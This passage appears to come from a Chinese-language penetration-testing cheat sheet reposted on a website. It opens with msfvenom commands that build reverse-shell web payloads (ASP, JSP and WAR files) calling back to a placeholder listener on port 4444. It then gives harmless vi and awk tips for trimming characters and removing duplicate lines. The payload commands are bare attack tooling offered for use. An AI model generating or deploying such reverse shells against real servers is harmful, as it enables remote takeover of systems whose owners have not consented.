msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > shell.asp
(4)Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f war > shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > shell.jsp
3、Linux小技巧
(1)vi
移除檔案前5個字符
:%s/^.\{5}//
移除檔案后5個字符
:%s/.\{5}$//
(2)AWK
洗掉重復行
awk '!seen[$0]++' file
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/325480.html
標籤:其他